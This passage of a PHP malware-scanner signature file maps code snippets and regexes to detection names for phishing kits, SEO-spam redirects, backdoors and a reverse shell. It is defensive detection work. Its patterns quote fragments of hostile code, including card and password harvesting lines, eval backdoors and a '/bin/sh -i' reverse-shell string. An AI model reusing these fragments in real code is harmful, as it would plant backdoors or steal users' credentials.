		'header("location:index.html");' => array(STR_TRIGGER,
			'header("location:home2.html");' => array(STR_TRIGGER,
				'if(isset($_SESSION["email"]) && isset($_SESSION[' => array(STR_CLEARFILE, 'php.phishing.script.018', NULL),
			),
		),

		'explode(PHP_EOL' => array(STR_TRIGGER,
			'preg_match_all(' => array(STR_TRIGGER,
				'd{1,3}' => array(STR_CLEARFILE, 'php.phishing.redirect.045', NULL),
			),
		),

		'base64_encode(' => array(STR_TRIGGER,
			'header("location: $src");' => array(STR_CLEARFILE, 'php.phishing.onedrive.001', NULL),
		),

		'function recurse_copy($' => array(STR_TRIGGER,
			'substr(str_shuffle(md5(time()' => array(STR_CLEARFILE, 'php.phishing.script.017', NULL),
		),

		'php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);' => array(STR_TRIGGER,
			'i\',@$_SERVER["HTTP_REFERER"])) {' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.redirect.050', 'if.(?:empty.._COOKIE. && )?preg_match.....google.....aol[^\']+\',@\$_SERVER..HTTP_REFERER\"\]\)\) \{\s*header\(\"location:[^\"]+\".\$_SERVER[^;]+;\s*exit;\s*}'),
		),

		'header("location:$DIR");' => array(STR_TRIGGER,
			'$DIR=md5(rand(' => array(STR_CLEARFILE, 'php.phishing.dir_redirector.001', NULL),
		),

		'if((strpos($agent,\'bot\') > 0 || $aaip ==1)' => array(STR_TRIGGER,
			'strpos($all,"ja")>-1 && (strpos($s_ref,"jp")>0' => array(STR_CLEARFILE, 'php.spam-seo.japanese-spam.006', NULL),
		),

		'@mkdir($' => array(STR_TRIGGER,
			'".$dst."/index.php?userid=".$' => array(STR_CLEARFILE, 'php.phishing.dir_redirector.002', NULL),
		),

		'http://www.se3curity.com' => array(STR_CLEARFILE, 'php.malware.redirect.001', NULL),
		'header("location: login.php?cmd=login_submit&id=' => array(STR_CLEARFILE, 'php.phishing.redirect.017', NULL),
		'header("location: http://www.google.com/mobile/gmail/#utm_source=en-cpp-g4mc-gmhp' => array(STR_CLEARFILE, 'php.phishing.gmail.003', NULL),
		'header("location: http://www.ubs.com/de/en.html");' => array(STR_CLEARFILE, 'html.phishing.UBS.001.02', NULL),
		'vffrg(\\$_CBFG[\'_hcy\']' => array(STR_CLEARFILE, 'php.backdoor.str_rot13_uploader.001', NULL),
		'header("location: https://drive.google.com/#my-drive");' => array(STR_CLEARFILE, 'php.phishing.google.001', NULL),
		'SCAM MADE BY Zer0ocool' => array(STR_CLEARFILE, 'php.phishing.zerocool.001',NULL),
		'$_SESSION[\'geoipcodeup\'] = $getipcode = base64_decode("' => array(STR_CLEARFILE, 'php.phishing.generic.030', NULL),
		'$message = $_POST[\'ccnum\']."|".$_POST[\'exp' => array(STR_CLEARFILE, 'php.phishing.mailer.062', NULL),
		'://credit-agricole-".string_random(' => array(STR_CLEARFILE, 'php.phishing.credit-agricole.001', NULL),
		'header("location: loading.php?email=$email&id=$' => array(STR_CLEARFILE, 'php.phishing.redirect.034', NULL),
		'Email: ".$_POST[\'Email\']."\r\n Pass: ".$_POST[\'Passwd' => array(STR_CLEARFILE, 'php.phishing.mailer.097', NULL),
	),

	'HTTP/1.0 404 Not Found' => array(STR_TRIGGER,

		'gethostbyaddr(getenv("REMOTE_ADDR")),\'google\') !== false' => array(STR_TRIGGER,

			'function is_bitch($user_agent)' => array(STR_TRIGGER,
				'$user_agent, $bitch' => array(STR_CLEARFILE, 'php.phishing.generic.043', NULL),
			),

            'if(strpos(gethostbyaddr(getenv('  => array(STR_TRIGGER,
                'window.location.hash;' => array(STR_CLEARFILE, 'php.phishing.redirect.047', NULL),
            ),

			'md5(microtime(' => array(STR_CLEARFILE, 'php.phishing.generic.005', NULL),
		),

		'$blocked_words = array(' => array(STR_TRIGGER, 
			'cyveillance' => array(STR_CLEARFILE, 'php.phishing.block_bots.001', NULL),
			'\'above\',\'google\',\'softlayer' => array(STR_CLEARFILE, 'php.phishing.block_bots.002', NULL),
		),

		'$bannedIP = array("^66.102.*.*",' => array(STR_TRIGGER,
			'header(\'HTTP/1.0 404 Not Found' => array(STR_CLEARFILE, 'php.spam-seo.bannedIP.001', NULL),
		),

		'{header(\'HTTP/1.0 404 Not Found\');exit;}' => array(STR_TRIGGER,
			'if (!isset($_COOKIE[' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.065', 'if\s*\(\!isset\(\$_COOKIE\[.\w+.\]\)\)\s*{header\(.HTTP.1\.0\s*404\s*Not\s*Found.\);exit;}'),
		),

		'fwrite($' => array(STR_TRIGGER,
			'fopen(".htaccess' => array(STR_CLEARFILE, 'php.phishing.block_bots.010', NULL),
		),

		'SHADOW Z118' => array(STR_CLEARFILE, 'php.phishing.ShadowZ118.001', NULL), 
		'(in_array("$shortip", $deny))' => array(STR_CLEARFILE, 'php.phishing.generic.054', NULL),
		'if(preg_match(\'/\' . $ip . \'/\',$_SERVER[\'REMOTE_ADDR\'])){' => array(STR_CLEARFILE, 'php.malware.antibot-check.004', NULL),
	),

	'header(\'location:' => array(STR_TRIGGER,

		'$productId = preg_replace(\'/[^\d]/\', \'\',$QUERYSTRING);' => array(STR_TRIGGER, 
			'header(\'location: http://\'.$sites.\'/index.php?main_page=product_info&products_id=\'.$productId);exit;' => array(STR_CLEARFILE,'php.spam-seo.redirect.044', NULL), 
		),

		'if(!preg_match(\'/(android|' => array(STR_TRIGGER,
			'header(\'location:https://www.chase.com/digital/resources/privacy-security' => array(STR_CLEARFILE, 'php.phishing.chasebank.002', NULL),
		),

		'header(\'location:\'.$m.$i.\'/security/\');' => array(STR_CLEARFILE, 'php.phishing.generic.001.001',NULL),
		'\'https://itunesconnect.apple.com/WebObjects/iTunesConnect.woa\'' => array(STR_CLEARFILE, 'php.phishing.itunesconnect.001',NULL),
		'header(\'location:https://www.login.alibaba.com\');' => array(STR_CLEARFILE, 'php.phishing.generic.072', NULL),
		'header(\'location: https://appleid.apple.com' => array(STR_CLEARFILE, 'php.phishing.apple.006', NULL),
		'if(isset($_GET[\'kokki\']))' => array(STR_CLEARFILE, 'php.spam-seo.redirect.137', NULL),
	),

	'require_once \'conf.php\';' => array(STR_TRIGGER,
		'$outch = curl_exec($ch);' => array(STR_CLEARFILE, 'php.spam-seo.Autodor_Wmsn.001', NULL),
		'file_put_contents(\'conf.php\', "' => array(STR_CLEARFILE, 'php.spam-seo.Autodor_Wmsn.002', NULL),
		'bb">BBCode</a>' => array(STR_CLEARFILE, 'php.spam-seo.Autodor_Wmsn.003', NULL),
		'header(\'Location: \'.$dir);' => array(STR_CLEARFILE, 'php.spam-seo.Autodor_Wmsn.004', NULL),
	),

	'header($_SERVER[\'SERVER_PROTOCOL\'] . \' 500 Internal Server Error\'' => array(STR_TRIGGER,
		'<title>Confirmation - Update' => array(STR_CLEARFILE, 'php.phishing.generic.064', NULL),
		'fwrite($file,$_SERVER[\'SERVER_NAME\']' => array(STR_CLEARFILE, 'php.phishing.redirect.039', NULL),
	),

	'function recurse_copy(' => array(STR_TRIGGER,
		'@mkdir($' => array(STR_TRIGGER,
			'rand(' => array(STR_TRIGGER,
				'md5(' => array(STR_TRIGGER,
					'header(' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.002', NULL),
				),
			),
		),
	),

	'$characters[rand(' => array(STR_TRIGGER,
		'function generateRandomString($length' => array(STR_TRIGGER,
			'header\(.[lL]ocation:[\s]*[\w]+\.php\?[^;]+\.[\s]*generateRandomString\([\d]+\)\);' => array(REX_CLEARFILE, 'php.phishing.script.023', NULL),
		),
	),

	'if ((stripos($_SERVER[\'REQUEST_URI\'], \'spy\')!== false || stripos($_SERVER[\'REQUEST_URI\'], \'monitor\')!==' => array(STR_TRIGGER,
		'stripos($_SERVER[\'HTTP_USER_AGENT\'], \'google\')=== false) { header("Location' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.081', 'if \(\(stripos\(\$_SERVER\[.REQUEST_URI.\], .spy.\)![^;]+header\(.Location[^;]+\);[\s]*}'),
	),

	'header("Location: https://facebook.com' => array(STR_TRIGGER,
		'$email:$pass:IP -> $ip:UA' => array(STR_CLEARFILE, 'php.phishing.facebook.001', NULL),
	),

	'403 Forbidden' => array(STR_TRIGGER,
		'\x00","charAt","decodeUTF8","indexOf","replace' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.016', NULL),
	),

	'define(\'X_RESULT_NAME\',' => array(STR_TRIGGER,
		'"://{$_SERVER[\'SERVER_NAME\']}".str_replace(basename($_SERVER[\'SCRIPT_NAME\']),"",$_SERVER[\'SCRIPT_NAME\']));' => array(STR_CLEARFILE, 'php.hacktool.spamtool.009', NULL),
	),

	'=isset(${"\x5f\x47\x45\x54"}[' => array(STR_TRIGGER,
		';header(\'Content-Type:text/html;charset=utf-8\');$' => array(STR_CLEARFILE, 'php.backdoor.eval_GET.003', NULL),
	),

	'!empty($_SERVER["HTTP_USER_AGENT"]) && !preg_match(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.112', 'if\(isset\(\$_SERVER\[.HTTP_USER_AGENT.\]\)[\s]*&&[\s]*!empty\(\$_SERVER\[.HTTP_USER_AGENT[^\{]+{[\s]*header\(.Location:[^)]+\);\}'),

	'header( "Location: https://www.halifax-online.co.uk' => array(STR_CLEARFILE, 'php.phishing.halifax.002', NULL),
	'header( "Location: http://www.lloydstsb.com' => array(STR_CLEARFILE, 'html.phishing.Lloyds.002', NULL),
	'header(\'Location: https://login.live.com/login.srf?wa=wsignin1.0&' => array(STR_CLEARFILE, 'php.phishing.hotmail.004', NULL),
	'if ($str === false && ini_get("allow_url_fopen") == "1") {' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.003', NULL),
	'{header("HTTP/1.1 301");header("Location' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.079', '(\$\w+)\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\]\s*;\s*if\((?:eregi|preg_match)\([\'"]\/?google\/?i?[\'"],\s*\1\)\)\s*{\s*header\([^;]+;\s*header\(.Location[^;]+;\s*exit\s*\(\)\s*;\s*}'),
	'include "../bts/anti' => array(STR_CLEARFILE, 'php.phishing.script.014', NULL),
	'$response = @file_get_contents($remote_cloaker' => array(STR_CLEARFILE, 'php.spam-seo.remote_cloaker.001', NULL),
	'$linksplit = trim($_REQUEST["LinkSplit"]);' => array(STR_CLEARFILE, 'php.spam-seo.jp-list.002', NULL),
	'header("LOCATION: http://185.36.100.210/' => array(STR_CLEARFILE, 'php.spam-seo.pornspam.001', NULL),
	'header(\'location:\'.$m.$i.\'/z.html\');' => array(STR_CLEARFILE,'html.phishing.americanexpress.008.01', NULL),
	'$subj = "Abiodun - $ip";' => array(STR_CLEARFILE,'php.phishing.mailer.009', NULL),
	'ocation: http://www.natwest.com/personal/logout/logout.ashx' => array(STR_CLEARFILE, 'php.phishing.natwest.001', NULL),
	'$n1  = $_POST[\'nutzername\'];' => array(STR_CLEARFILE, 'php.phishing.generic.001', NULL),
	'header("Location: https://www.netflix.com' => array(STR_CLEARFILE, 'php.phishing.netflix.001', NULL),
	'($BASE."/.wtf/".$ACN.".txt");' => array(STR_CLEARFILE, 'php.phishing.generic.032', NULL),
	'?bl=1&email=$ux");' => array(STR_CLEARFILE, 'php.phishing.mailer.049.07', NULL),
	'$host = bin2hex ($_SERVER[\'HTTP_HOST\']);' => array(STR_CLEARFILE, 'php.phishing.generic.035', NULL),
	'(isset($_POST[\'email\']) && isset($_POST[\'password\'])) ? \'https://www.netflix.com/Login?' => array(STR_CLEARFILE, 'php.phishing.netflix.004', NULL),
	'if ($_SESSION[\'_cctype_' => array(STR_CLEARFILE, 'php.phishing.generic.076', NULL),
	'header("Host: appleid.apple.com");' => array(STR_CLEARFILE, 'php.phishing.apple.007', NULL),
	'substr(strrchr($email, "@"), 1);' => array(STR_CLEARFILE, 'html.phishing.generic.100.03', NULL),
),

'ror_reporting' => array(STR_TRIGGER,

	'error_reporting(0)' => array(STR_TRIGGER,
	
		'dns_get_record($d[$i % count($d)], DNS_TXT);' => array(STR_TRIGGER,
	
			'.substr(md5(strtolower($' => array(STR_TRIGGER,
				'array(base64_decode(str_replace(' => array(STR_CLEARFILE, 'php.spam-seo.redirect.140', NULL),
			),
	
			'urlencode(urldecode($_SERVER[\'QUERY_STRING\'])), TRUE,' => array(STR_CLEARFILE, 'php.spam-seo.redirect.103', NULL),
		),
	
		'@error_reporting(0);' => array(STR_TRIGGER,
			'$code=@urldecode($code);$code=@strrev($code);@eval($code);' => array(STR_CLEARFILE, 'php.backdoor.filesman.044', NULL),
			'7P1pe9s4sjAMfz5zXfMfGI2nY48da/WiuO1uat/3PZ3HQ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.064', '\@error_reporting\(0\);\s*\@set_time_limit\(0\);\s*\$\w+\s*=\s*\"7P1pe9s4sjAMfz5zXfMfGI2nY48da[^\"]+\";'),
		),
	
		'","a+"); @fputs($' => array(STR_TRIGGER,
			'@strpos($' => array(STR_TRIGGER,
				':ptth");' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.073', 'error_reporting.0.;[\\s]*\\$[\\w\\s]+=[\\s]strrev[^;]+ptth..;[^;]+\\$[\\w\\s]+=[\\s]*file_get_contents[^?]+if[\\s]*\\([\\s]*@filesize[^}]+@fclose\\(\\$[\\w_]+\\);[\\s]*}[\\s]*}'),
			),
		),
	
		'function RecursiveDelete($sDirectory, $bIsEmpty = false)' => array(STR_TRIGGER,
			'if(isset($_REQUEST[\'GetContent\']) === true)' => array(STR_TRIGGER,
				'echo $sOutContent;' => array(STR_CLEARFILE, 'php.spam-seo.injector.183', NULL),
			),
		),
	
		'api.txt' => array(STR_TRIGGER,
			'ident.txt' => array(STR_TRIGGER,
				'$_GET[\'api' => array(STR_CLEARFILE, 'php.phishing.script.022', NULL),
			),
		),
	
		'echo "<!--google->";' => array(STR_TRIGGER,
			'echo "<!--/google-->";' => array(STR_TRIGGER,
				'|google|yandex/i\', $_SERVER[\'HTTP_USER_AGENT\']))' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.328', 'error_reporting\(0\);[\s]*if[\s]*\(preg_match\([^,]+google\|yandex.i.,[\s]*\$_SERVER\[.HTTP_USER_AGENT[^\}]+echo .<!--.google-->.;[\s]*\}'),
			),
		),
	
		'<?php error_reporting(0);' => array(STR_TRIGGER,
			'GIF89a' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.048', NULL),
		),
	
		',\'\');die();' => array(STR_TRIGGER,
			'="\x73\x74\x72\x5f\x72\x6f\x74".(' => array(STR_CLEARFILE, 'php.backdoor.webshell.236', NULL),
		),
	
		'echo "<true>".$row[0]."<true>";' => array(STR_TRIGGER,
			'$link = mysql_connect(urldecode($_POST[' => array(STR_CLEARFILE, 'php.spam-seo.injector.154', NULL),
		),
	
		'fn_dolly_get_filename_from_headers($headers)' => array(STR_TRIGGER,
			'return \'wp-\' . md5(get_home_url() . \'w_cookie\');' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.002', NULL),
		),
	
		'if(!preg_match("/google' => array(STR_TRIGGER,
			'$popup_files[$i] = trim($v[1]);' => array(STR_CLEARFILE, 'php.spam-seo.rough_popup.001', NULL),
		),
	
		'echo "GOOD<br>".$cache_dir;' => array(STR_TRIGGER,
			'$body = file_get_contents($cache_dir."/".$post_url_cache."_body.js");' => array(STR_CLEARFILE, 'php.spam-seo.injector.181', NULL),
		),
	
		'$count[$browser] += $data[$browser];' => array(STR_TRIGGER,
			'header(\'Location: \' .' => array(STR_CLEARFILE, 'php.spam-seo.redirect.063', NULL),
		),
	
		'$ipArray = file("Bad.txt");' => array(STR_TRIGGER,
			'$domain[rand(' => array(STR_CLEARFILE, 'php.phishing.redirect.026', NULL),
		),
	
		'getenv("REMOTE_ADDR");' => array(STR_TRIGGER,
			'$randomlink = md5(' => array(STR_CLEARFILE, 'php.spam-seo.redirect.092', NULL),
		),
	
		'$denyIP' => array(STR_TRIGGER,
			'header("Location: https://www.apple.com");' => array(STR_CLEARFILE, 'html.phishing.apple.017', NULL),
		),
	
			'=\')).\'("\'.$location.str_replace("\\\\", "\\\\\\\\", $_SERVER[\'REQUEST_URI\']).\'");</script></body></html>\';' => array(STR_CLEARFILE, 'php.malware.injector.087', NULL),
		'//###=' => array(STR_TRIGGER,
			'error_reporting(0); ini_set("display_errors", "0"); if (!isset(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.055', '\/\/###=+#+[\s]*error_reporting\(0\);[\s]*ini_set[^;]+\);[\s]*if[\s]*\(!isset[^\{]+\{[\s]*\$[\w]+[\s]*=[\s]*[\w]+;[\s]*\$GLOBALS[^=]+=[\s]*Array\(base64_decode[^;]+;[\s]*function[^#]+\}[\s]*\/\/###=+#+'),
		),
	
		'if (eregi(\'-dbst\',$_SERVER[\'REQUEST_URI\'])) {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_downloader.005', 'if[\\s]*.eregi..-dbst.,\\$_SERVER..REQUEST_URI......[\\s]*error_reporting.0.;[\\s]*include[^;]+;[\\s]*exit..;[\\s]*}'),
		'setcookie("__utpg", $active, time() + $temps, "/", "' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.086', 'error_reporting.0.;[\\s]*.code = "[\\d]+";[\\s]*.url = ._SERVER."REQUEST_URI".;[^!]+!preg_match..........url. && .!isset[^!]+!preg_match...google[^}]+0.;[\\s]*\}'),
		'php error_reporting(0);$a=str_split($password.\'2\',\'3' => array(STR_CLEARFILE, 'php.spam-seo.redirect.007', NULL),
		'lZfNbuRGDITvAfIOhuFDclmM' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.021', '<.php ob_start..; .>[\\s]*<.php error_reporting.0.; .>[\\s]*<.php[\\s]*preg_replace."....e",".x65.x76.x61.x6C.x2[^>]+lZfNbuRGDITvAfIOhuFDc[^>]+.x3B","".;[\\s]*.>[\s]*'),
		'\'@^\'.$target_siteurl.\'/*@is\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.126', NULL),
		'$result[] = \'The script requires one of the following operating systems' => array(STR_CLEARFILE, 'php.hacktool.check_requirements.001', NULL),
		'$websource= GetWebCode($site.$_REQUEST' => array(STR_CLEARFILE, 'php.spam-seo.injector.076', NULL),
		'<table border="0"><tr><td>TDS</td><td><input type="text" name="ptds" value="' => array(STR_CLEARFILE, 'php.spam-seo.tds-redirect.001', NULL),
		'getContent($myHost, $pathOnMyHost.$path, $template, $pathToDor);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.008', NULL),
		'$Remote_directory = $Remote_server."/pstmu.asp"' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.009', NULL),
		'echo \'    <center><b>Remote WHM Creator</b><br>' => array(STR_CLEARFILE, 'dir.hacktool.remote_whm_creator.001', NULL),
		'if($clicid == "13698"){' => array(STR_CLEARFILE, 'php.phishing.generic.023', NULL),
		'if (strpos($str, "Bienvenue dans votre Espace Client' => array(STR_CLEARFILE, 'php.phishing.generic.024', NULL),
		'$string_of_redirect_for_write_in_htaccess="RewriteRule ^".$rand_dir."(.*)\.".$_POST[\'redirect_expansion' => array(STR_CLEARFILE, 'php.spam-seo.injector.152', NULL),
		'define("FRH_TOTAL", count($scams));' => array(STR_CLEARFILE, 'php.spam-seo.redirect.043', NULL),
		'if(CheckAgt($spi)== \'1\'){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.037', 'error_reporting.0.;[\\s]*\\$from=[^;]+;[\\s]*\\$www=.1.;[\\s]*\\$files[\\s]*=[\\s]*!empty.._GET[^;]+;[\\s]*function CheckAgt[^\\?]+if.isset.._GET[^}]+exit..;[\\s]*}[^>]+echo \\$[\\w]+;[\\s]*exit..;[\\s]*}'),
		'preg_match_all("/<content>(.*?)<\/content>/s", $sOutContent, $lssArrayMatches);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.039', NULL),
		'SHADOW Z118' => array(STR_CLEARFILE, 'php.phishing.ShadowZ118.001.02', NULL), 
		'echocrond($LoadLogs . \'c\');' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.069', NULL),
		'curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cDovL3Bhc3RlYmluLmNvbS9y' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.014', NULL),
		'()==false){@header("Location: https://bit.ly' => array(STR_CLEARFILE, 'php.spam-seo.redirect.129', NULL),
		'$setting = plugins($_GET["query"],$dimi);' => array(STR_CLEARFILE, 'php.backdoor.uploader.364', NULL),
		'@$indexx="c' => array(STR_CLEARFILE, 'php.spam-seo.injector.329', NULL),
		'(\'.\');if(count($rs)<850){header(\'HTTP/1.1 200\');exit;}' => array(STR_CLEARFILE, 'php.hacktool.site_scanner.004', NULL),
	),

	'gzinflate(substr(' => array(STR_TRIGGER,

		'<?php error_reporting(E_ALL^E_NOTICE);define(' => array(STR_TRIGGER,
			'explode(\'|' => array(STR_CLEARFILE, 'php.malware.infector.006', NULL),
		),

		'$password=$_GET{' => array(STR_TRIGGER,
			'}{0x00295},$_GET{' => array(STR_CLEARFILE, 'php.malware.obfuscated.054', NULL),
		),
	),

	'ASSERT_WARNING' => array(STR_TRIGGER,
		'riny(".$strings2' => array(STR_CHAIN_TRIGGER,
			'"riny(".$strings2("base64_decode");' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.065', '@ini_set\(.error_log[^;]+\);[^\$]+\$[\w]+[\s]*=[\s]*ASSERT_WARNING;[\s]*@?assert_options[^\>]+\)\);.\);[\s]*\$[\w]+\(\$[\w]+\);[\s]*(\}[\s]*else[\s]*\{[\s]*echo[^\?\n]+\})?'),
			'@error_reporting(E_ALL);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.065.02', '@error_reporting\(E_ALL\);[\s]*'),
		),
	),

	'$content = file_get_contents($file);' => array(STR_TRIGGER,
		'if(isset($_GET[\'check\'])){' => array(STR_TRIGGER,
			'file_put_contents($_GET[\'name\'], $content);' => array(STR_CLEARFILE, 'php.backdoor.uploader.097', NULL),
		),
	),

	'<title>404 Not Found</title>' => array(STR_TRIGGER,
		'if(!isset($_SESSION[\'login\']) or $_SESSION[\'login\'] != $xPassword){' => array(STR_CLEARFILE, 'php.backdoor.webshell.073', NULL),
	),

	'header("HTTP/1.0 404 Not Found");' => array(STR_TRIGGER,
		'@include($_FILES' => array(STR_CLEARFILE, 'php.malware.include.029', NULL),
	),

	'array("pipe","r"),1=>array("pipe","w")' => array(STR_TRIGGER,
		'"export TERM=xterm;PS1=\'\$PWD>\';export PS1;/bin/sh -i"' => array(STR_CLEARFILE, 'php.backdoor.reverseshell.002', NULL),
	),

	'ZXZhbChiYXNlNjRfZGVjb2RlKGFycmF5X3NoaWZ0KGFycmF5X3ZhbHVlcygk' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.079', 'error_reporting\(0\)\;\s*\$\w+\s*=\s*\".x[^;]+;\s*\$\w+\s*=\s*\".x[^;]+;\s*\$\w+\s*=\s*\d+\s*;\s*\$\w+\s*=\s*\"\"\s*;\s*for\s*\(\$i\s*=\s*0\s*;\s*\$i\s*<\s*strlen\(\$\w+\)\s*;\s*\$i\+\+\)\s*\$\w+\s*\.\s*=\s*sprintf\(\"\%c\"\s*,[^\+]+\+\+\)\s*\$\w+\s*\.\s*=\s*sprintf\(\"\%c\",[^;]+;\s*\$\w+\s*=\s*\$\w+\(\"\",\s*\$\w+\(\"\w+ZXZhbChiYXNlNjRfZGVjb2RlKGFycmF5X3NoaWZ0KGFycmF5X3ZhbHVlcygkX1BPU1QpKSkpOyB9\"\)\)\s*;\s*\$\w+\(\)\s*;(\s*\/\*\w+\*\/)?'),
	'\$\w+\s*=\s*[asert\s\"\.]+\$[a-zA-Z]{0,8}\.[asert\s\"\.]+\$[a-zA-Z]{0,8}\.[asert\s\"\.]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.assertdata.002', 'error_reporting\(0\);\s*\$\w+\s*=\s*[asert\s\"\.]+\$[a-zA-Z]{0,8}\.[asert\s\"\.]+\$[a-zA-Z]{0,8}\.[asert\s\"\.]+;\s*\$\w+[^;]+;[\*\/\(\;]+\$[\/\*\;]+{[\.\"\_POST]+\$\w+[\.\"_POST]+\$\w+[\.\"\_POST]+}\s*\[.\w+.\]\);'),
	');$wp_re_update=strrev("/wordpress' => array(STR_CLEAR_LINEMATCH, 'php.malware.strrev.007', 'error_reporting\(0\);\$wp_re_update=strrev\(".wordpress.ofni.do7..:ptth"\);'),
	'$baidufromsite="http:' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.015', 'error_reporting\(0\);[^>]+echo .<script>window.location[^>]+script>.;[^>]+BaiDuSpider.[^>]+function isSearch[^\}]+return true;.[^;]+return false;[^>]+\}'),
	'<?php /*/ Encode By FathurFreakz /*/ @error_reporting(0)' => array(STR_CLEARFILE, 'php.backdoor.FathurFreakz.001', NULL),
	'@error_reporting(0); if (!isset($eva' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell_gen.041', '..php @error_reporting.0.; if ..isset..eva.*'),
	'global $__gp_ai,$__gp;if(!@$__gp_ai){error_reporting(0);' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.gp_shell.001','global .__gp_ai,.__gp;if.!..__gp_ai..error_reporting.0.;[\\s]+class __gp[^>]+=== config ===.*__gp=new __gp;.__gp_ai=.bool..__gp;'),
	'if(isset($_POST[\'xxxprch\']))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.pagerank.001','GLOBAL\s*\$alreadyxxx[^\^]+function getpr..url[^>]+POST..xxxprch[^>]+error_reporting.\$olderrxxx[^\}]+\}'),
	'$zend_framework="\x63\162' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.webshell_gen.046', '.zend_framework=..x63.162.*x3b.57.x2f\"\);'),
	'echo $line["user_login"]."<|>".$line["user_pass"]."|new|";' => array(STR_CLEARFILE,'php.hacktool.cms_credentials_stealer.002', NULL),
	'¦--- PRIVATE  PP SCAM' => array(STR_CLEARFILE,'php.phishing.paypal.007', NULL),
	'¦--- PRIVATE PAYPAL SCAM' => array(STR_CLEARFILE,'php.phishing.paypal.007.01', NULL),
	'error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.019', 'error_reporting\\(0\\);ini_set\\("display_errors", 0\\);include_once\\(sys_get_temp_dir\\(\\)."[^"]+"\\);'),
	'error_reporting(0);eval("if(isset(\$_REQUEST' => array(STR_CLEAR_LINEMATCH,'php.backdoor.eval_POST.042', 'error_reporting.0.;eval."if.isset..._REQUEST[^>]+exit..;[^;]+\\);'),
	'$isReturnFiles = isset($_GET[\'isreturn\'])?true:false;' => array(STR_CLEARFILE, 'php.backdoor.webshell.085', NULL),
	';$_=\'create\'.\'_\'.\'function\';$__=$_' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.070', NULL),
	'error_reporting(0); $wp_db_update = strrev(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.232', 'error_reporting\(0\);[\s]*\$wp_db_update[\s]*=[\s]*strrev\([^;]+\);[^{]+@stripos\(\$[\w]+,[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*@file_get_contents[^}]+\}[\s]*if[\s]*\([\s]*@is_file[^}]+@fclose\(\$[\w]+\);[\s]*\}'),
	'echo "AnonymousFox' => array(STR_CLEARFILE, 'php.backdoor.uploader.235', NULL),
	'}}($query_str);foreach($user_ids as $uid){$user_id=$uid->ID;if($GLOBALS{' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.007', NULL),
),

'_COOKIE' => array(STR_TRIGGER,

	'setcookie' => array(STR_TRIGGER,

		'])){setcookie(' => array(STR_TRIGGER,

			'.php\');die();}' => array(STR_TRIGGER,
				');header(\'Location: http:' => array(STR_CLEAR_LINEMATCH, 'php.redirect.header_location.030', 'if\(!isset\(\$_[\w]+\[[^\]]+\]\)\)\{setcookie[^;]+\);header\(.Location[^;]+;die\(\);\}'),
			),

			'ucwords(strtolower(str_replace(' => array(STR_TRIGGER,
				'(@strpos(@strtolower($this->cookie)' => array(STR_CLEARFILE, 'php.malware.curl.028', NULL),
			),

			'{if(stripos($_SERVER[\'HTTP_USER_AGENT\'],$' => array(STR_CLEAR_LINEMATCH, 'php.redirect.header_location.033', 'error_reporting\(0\);function[\s]*[^\{]+\{\$[\w]*=.01234567[\w]+.;\$[\w]+=strlen\(\$[\w]+\);\$[^\}]+\)\];\}return\$[\w]+;\}\$[\w]+=array\([^\*]+,time\(\)\+[^;]+\);[\s]*header\(.L[^\}]+\(\)\);\}\}\};'),
		),

		'{@setcookie(' => array(STR_TRIGGER,

			'@header(strrev(' => array(STR_TRIGGER,
				'/i\',$_SERVER[\'HTTP_USER_AGENT\']) && $_COOKIE[' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.099', 'if\(preg_match\([^,]+i.,\$_SERVER\[.HTTP_USER_AGENT.\]\) && \$_COOKIE\[[^\{]+\{@setcookie[^;]+\);[\s]*@header\(strrev[^;]+\);[\s]*die[^\}]+\}'),
			),

			'error_reporting(0);if(isset($_COOKIE["ping"])){@setcookie("pong"' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.309', '\$[\w]+=[\d]+;[\s]*error_reporting\(0\);[\s]*if\(isset\(\$_COOKIE\[.ping[^\{]+\{[\s]*@setcookie[^\}]+\}[\s]*return[^\}]+\}\}[\s]*@ob_start[^\}]+\}\}[\s]*\$[\w]+[\s]*=[\s]*[\d]+;'),
		),

		'header("Location:' => array(STR_TRIGGER,

